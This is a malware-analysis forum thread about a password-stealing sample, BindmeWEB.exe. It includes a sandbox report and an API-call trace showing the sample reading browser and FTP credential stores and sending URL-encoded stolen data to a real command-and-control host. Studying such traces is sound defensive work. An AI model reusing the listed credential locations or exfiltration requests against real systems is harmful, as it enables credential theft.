A forum for reverse engineering, OS internals and malware analysis 

PWS.Dybalom

Forum for analysis and discussion about malware.

PWS.Dybalom

 #1259  by Jaxryley
 Thu Jun 10, 2010 12:16 am
BSA:
Detailed report of suspicious malware actions:

Detected backdoor listening on port: 0
Detected process privilege elevation
Internet connection: C:\Users\Administrator\Desktop\BindmeWEB.exe Connects to "91.207.192.69" on port 80 (TCP - HTTP).
Listed all entry names in a remote access phone book
Opened a service named: RASMAN
Opened a service named: Sens
Query DNS: bon3rz.com

Risk evaluation result: High
Result: 7/41 (17.08%) - Win32:Dracur-D
http://www.virustotal.com/analisis/d376 ... 1276128023
(383.66 KiB) Downloaded 55 times

Re: Win32:Dracur-D

 #1261  by gjf
 Thu Jun 10, 2010 10:49 am
Code: Select all
.........
CreateMutex(Local\_!MSFTHISTORY!_) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!local settings!temporary internet files!content.ie5!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\Content.IE5\index.dat) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!cookies!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Cookies\index.dat) [d:\bindmeweb.exe]
CreateMutex(Local\c:!documents and settings!администратор!local settings!history!history.ie5!) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Администратор\Local Settings\History\History.IE5\index.dat) [d:\bindmeweb.exe]
........
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%63%68%72%6F%6D%65%3A%2F%2F%73%78%69%70%70%65%72%2F%61%63%63%6F%75%6E%74&l=%31%33%66%34%63%35%39%37%2D%65%31%34%37%2D%34%62%64%62%2D%39%66%31%33%2D%37%32%61%61%38%37%63%30%31%30%39%38&p=%70%4C%4B%67%37%6F%6B%36%57%79%73%56%45%6F%4E%35%48%33%69%53%71%6B%49%72%59%34%79%59%69%45%41%4F&c=%53%52)
........
InternetConnect(bon3rz.com) [d:\bindmeweb.exe]
HttpOpenRequest(/final/index.php?action=add&a=10&u=%63%68%72%6F%6D%65%3A%2F%2F%73%78%69%70%70%65%72%2F%61%63%63%6F%75%6E%74&l=%31%33%66%34%63%35%39%37%2D%65%31%34%37%2D%34%62%64%62%2D%39%66%31%33%2D%37%32%61%61%38%37%63%30%31%30%39%38&p=%70%4C%4B%67%37%6F%6B%36%57%79%73%56%45%6F%4E%35%48%33%69%53%71%6B%49%72%59%34%79%59%69%45%41%4F&c=%53%52) 
........
InternetOpenURL(http://bon3rz.com/final/index.php?action=add&a=10&u=%73%79%6E%63%2E%78%6D%61%72%6B%73%2E%63%6F%6D%20%28%58%6D%61%72%6B%73%20%53%79%6E%63%20%4C%6F%67%69%6E%29&l=%67%6A%66&p=%7B%61%74%74%21%49%4C%41%7D&c=%53%52) [d:\bindmeweb.exe]
HttpOpenRequest(/final/index.php?action=add&a=10&u=%73%79%6E%63%2E%78%6D%61%72%6B%73%2E%63%6F%6D%20%28%58%6D%61%72%6B%73%20%53%79%6E%63%20%4C%6F%67%69%6E%29&l=%67%6A%66&p=%7B%61%74%74%21%49%4C%41%7D&c=%53%52) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Application Data\Mozilla\Firefox\Profiles\z65hwjfj.Fixxxer\signons.sqlite) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2) [d:\bindmeweb.exe]
Copy(C:\Documents and Settings\Администратор\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data->C:\Documents and Settings\Администратор\Application Data\chrtmp) [d:\bindmeweb.exe]
CreateFile(C:\Documents and Settings\Application Data\chrtmp) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\DownloadManager\Passwords) [d:\bindmeweb.exe]
RegOpenKeyEx(HKCU\Software\SmartFTP\Client 2.0\Settings\History\Items) [d:\bindmeweb.exe][d:\bindmeweb.exe] [d:\bindmeweb.exe]
and then it shuts down. Pass stealer?
 Return to “Malware”